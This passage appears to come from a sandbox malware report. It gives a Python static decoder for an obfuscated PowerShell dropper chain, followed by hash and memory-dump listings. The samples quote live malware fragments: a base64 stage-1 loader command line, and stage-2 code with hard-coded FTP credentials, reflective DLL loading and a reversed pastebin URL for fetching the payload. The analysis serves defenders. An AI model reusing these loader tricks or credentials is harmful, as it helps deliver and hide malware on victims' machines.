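stage 2, and two fragments copied from stage 2. The parser assumes the concatenation uses only single-quoted literals and `[char]N` casts, which is all this loader uses.

```python
import base64
import re

# What the stage-1 loader concatenates: single-quoted PowerShell literals and
# [char]NN casts joined with '+'. Assumption: no doubled-quote escapes inside a
# literal (this loader never emits any).
TOKEN_RE = re.compile(r"'([^']*)'|\[char\](\d+)")
REPLACE_RE = re.compile(r"\.replace\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)
# stage 2 hides a username as a char array and stores a URL backwards
CHAR_ARRAY_RE = re.compile(r"-join\s*\[char\[\]\]\s*\(([\d\s,]+)\)", re.I)
REVERSED_URL_RE = re.compile(r"'([^']*//:s?ptth)'")


def rebuild_concat(expr: str) -> str:
    """Evaluate a '...' + [char]NN + '...' chain without running PowerShell."""
    return "".join(chr(int(code)) if code else lit
                   for lit, code in TOKEN_RE.findall(expr))


def decode_stage1(cmdline: str) -> str:
    """Statically unpack the wscript-spawned powershell.exe command line.

    Follows the loader's own order: rebuild the blob, apply the .replace()
    calls issued before FromBase64String, base64-decode, decode as UTF-16LE
    (Encoding::Unicode) and apply the .replace() calls issued afterwards,
    which patch the dropper's on-disk path into the script.
    """
    m = re.search(r"\$(\w+)\s*=\s*('.*?)\s*;\s*\$\1\s*=", cmdline, re.S)
    if not m:
        raise ValueError("no '$var = <concatenation>;' assignment found")
    expr = m.group(2)
    before, sep, after = cmdline.partition("FromBase64String")
    if not sep:
        raise ValueError("not the FromBase64String scheme this decoder handles")
    blob = rebuild_concat(expr)
    for old, new in REPLACE_RE.findall(before):
        blob = blob.replace(old, new)
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    encoding = "utf-16-le" if "Encoding]::Unicode" in after else "utf-8"
    script = raw.decode(encoding)
    for old, new in REPLACE_RE.findall(after):
        script = script.replace(old, new)
    return script


def extract_stage2_iocs(script: str) -> dict:
    """Recover the char-array strings and reversed URLs a stage-2 script carries."""
    strings = ["".join(chr(int(n)) for n in nums.split(",") if n.strip())
               for nums in CHAR_ARRAY_RE.findall(script)]
    urls = [s[::-1] for s in REVERSED_URL_RE.findall(script)]
    return {"char_array_strings": strings, "reversed_urls": urls}


# Constructed from the stage-1 command line in this report: its first nine
# chunks (truncated at a 4-character base64 boundary) plus the unpacking tail.
STAGE1_SAMPLE = (
    "-command $fLbjh = 'JA' + [char]66 + 'UAFEATQ' + [char]66 + 'kAEYAIAA9ACAAJA' + [char]66 + "
    "'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + "
    "[char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsA';"
    "$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;"
    "$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;"
    r"$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js') ;"
    "powershell $fLbjh"
)

# Constructed from two fragments of the stage-2 script in this report.
STAGE2_SAMPLE = (
    "$hpxe.Credentials = new-object System.Net.NetworkCredential((-join [char[]]"
    "(100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');"
    "[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' )"
    ".GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'KQdVc6G6/war/moc.nibetsap//:sptth' , "
    r"'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js', 'true' ) );"
)

if __name__ == "__main__":
    print(decode_stage1(STAGE1_SAMPLE))
    print(extract_stage2_iocs(STAGE2_SAMPLE))
```

Run against the full six-line command line from the tree, decode_stage1 yields the stage-2 script the sandbox printed for PID 4744. The same replace-then-FromBase64String trick recurs in stage 2, where the DLL fetched over FTP is stored with every `A` rewritten as `↓:↓`; REPLACE_RE already handles `.Replace( '↓:↓' , 'A' )`, so the loop in decode_stage1 applies unchanged once that blob is in hand.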

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      6cf293cb4d80be23433eecf74ddb5503

      SHA1

      24fe4752df102c2ef492954d6b046cb5512ad408

      SHA256

      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

      SHA512

      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

    • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\wpnoa.ps1

      Filesize

      232KB

      MD5

      cf594063c738ae07171e6c6edc8a1277

      SHA1

      3c47e47bc90a71a4255b72505bb50a84e3c2d712

      SHA256

      84a031eb8b28b80d6ee7ed4e870c6776cb1f12a1dead8c8aa033e9c675fca487

      SHA512

      6f2ea0b7f8f01240ff786bbc3c253d46e2ea0ea0c08657a2357147b17232e4ac5745a0ab8da2d73b7ab03bab89b4f219d74f6654d99e5fbba72b7b2d63080115

    • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

      Filesize

      334B

      MD5

      68fef3132ed2fe642c26e40cf12a66f7

      SHA1

      5797e4790462e87172916c01245c525c5ef89c5d

      SHA256

      3a9f97203fdedc7c5747d62d582e0a057a582acebbf56e099b87642404ad8ecb

      SHA512

      c4fe06b37961706f3503a2d5e120ad46023aa722ecc6778e0b31d979e5b813124fabe5c78858d485adbdfe34225d02f2e3d63fd78389ac7ddc6861380c9bc962

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      387eb7d3f9ac68be25ca2678748aab34

      SHA1

      b7ad87b56f5235279a590f47ddc10b4308d0378c

      SHA256

      9bea7a125ae2b802e05d853bf1dbdbdcc35dba622e90c1e28443d33b327765ee

      SHA512

      d900ae4a4ecd8a70eb278de5af07eb53534816c5fa04195ffdf5f2d4b7f614628fe22402b016cd8621bb3f9da1282d2730873b370aa2402a2b611b29046cd23a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      c1a54dd5a1ab44cc4c4afd42f291c863

      SHA1

      b77043ab3582680fc96192e9d333a6be0ae0f69d

      SHA256

      c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

      SHA512

      010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_felfokah.wxo.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1048-56-0x0000026B6A4D0000-0x0000026B6A4DA000-memory.dmp

      Filesize

      40KB

    • memory/4356-1-0x00000198F2D50000-0x00000198F2D72000-memory.dmp

      Filesize

      136KB

    • memory/4356-11-0x00007FF873D40000-0x00007FF874801000-memory.dmp

      Filesize

      10.8MB

    • memory/4356-12-0x00007FF873D40000-0x00007FF874801000-memory.dmp

      Filesize

      10.8MB

    • memory/4356-0-0x00007FF873D43000-0x00007FF873D45000-memory.dmp

      Filesize

      8KB

    • memory/4356-44-0x00007FF873D40000-0x00007FF874801000-memory.dmp

      Filesize

      10.8MB

    • memory/4744-22-0x00000207CDB80000-0x00000207CDB8A000-memory.dmp

      Filesize

      40KB

    • memory/4812-57-0x0000000000400000-0x0000000000410000-memory.dmp

      Filesize

      64KB

    • memory/4812-59-0x00000000050A0000-0x000000000513C000-memory.dmp

      Filesize

      624KB

    • memory/4812-60-0x00000000058F0000-0x0000000005E94000-memory.dmp

      Filesize

      5.6MB

    • memory/4812-61-0x00000000053F0000-0x0000000005456000-memory.dmp

      Filesize

      408KB

    • memory/4812-62-0x0000000005600000-0x0000000005692000-memory.dmp

      Filesize

      584KB

    • memory/4812-63-0x00000000061F0000-0x00000000061FA000-memory.dmp

      Filesize

      40KB

    • memory/4812-64-0x0000000007FC0000-0x0000000007FCE000-memory.dmp

      Filesize

      56KB